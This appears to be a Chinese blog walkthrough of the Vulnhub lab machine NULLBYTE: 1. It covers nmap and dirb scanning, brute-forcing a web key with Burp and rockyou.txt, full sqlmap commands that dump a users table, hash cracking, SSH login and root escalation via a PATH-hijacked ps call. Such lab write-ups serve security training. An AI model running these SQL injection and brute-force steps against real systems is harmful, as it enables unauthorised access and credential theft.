Vulnhub-靶机-NULLBYTE: 1

Vulnhub-靶机-NULLBYTE: 1

 

扫描主机IP地址

arp-scan -l 

Vulnhub-靶机-NULLBYTE: 1_第1张图片

 

nmap -sV -Pn -A x.x.x.240 发现80,111,777端口

Vulnhub-靶机-NULLBYTE: 1_第2张图片

打开80端口,进行访问

Vulnhub-靶机-NULLBYTE: 1_第3张图片

dirb进行扫描,dirb http://x.x.x.240,并不能利用

Vulnhub-靶机-NULLBYTE: 1_第4张图片

下载图片,查看图片隐藏信息,发现一个目录

Vulnhub-靶机-NULLBYTE: 1_第5张图片

访问

Vulnhub-靶机-NULLBYTE: 1_第6张图片

得到如上结果,发现是一个key,需要输入字符,这里是带星号的,这一看是没有任何防护措施,于是使用burpsuite抓包进行密码爆破,爆破的字典就使用kali中的rockyou.txt进行爆破,最终得到结果如下:

Vulnhub-靶机-NULLBYTE: 1_第7张图片

输入密码之后得到如下结果:

Vulnhub-靶机-NULLBYTE: 1_第8张图片

随便输入一个数字

感觉使sql注入,sqlmap跑一下,确实是

 Vulnhub-靶机-NULLBYTE: 1_第9张图片

sqlmap -u"http://x.x.x.240/kzMb5nVYJw/420search.php?usrtosearch=2” --dbs

Vulnhub-靶机-NULLBYTE: 1_第10张图片

sqlmap -u"http://x.x.x.240/kzMb5nVYJw/420search.php?usrtosearch=2” -D seth --tables

Vulnhub-靶机-NULLBYTE: 1_第11张图片

sqlmap -u"http://x.x.x.240/kzMb5nVYJw/420search.php?usrtosearch=2” -D seth -T users -C "user,pass" --dump

Vulnhub-靶机-NULLBYTE: 1_第12张图片

保存base64到hash.txt

Vulnhub-靶机-NULLBYTE: 1_第13张图片

进行爆破

Vulnhub-靶机-NULLBYTE: 1_第14张图片

得到密码

ssh登录

Vulnhub-靶机-NULLBYTE: 1_第15张图片

ls -al 查看隐藏文件

Vulnhub-靶机-NULLBYTE: 1_第16张图片

查看 procwatch 发现是二进制文件

Vulnhub-靶机-NULLBYTE: 1_第17张图片

运行

Vulnhub-靶机-NULLBYTE: 1_第18张图片

发现像是使用shell脚本的形式执行了ps命令,这里如果懂二进制的话,大可以直接去调试二进制文件看看,可以参考:https://www.nuharborsecurity.com/nullbyte-1-walkthrough/

发现ps提权

Vulnhub-靶机-NULLBYTE: 1_第19张图片

得到root权限,并进入root目录查看文件

Vulnhub-靶机-NULLBYTE: 1_第20张图片

你可能感兴趣的:(靶机,linux,mysql)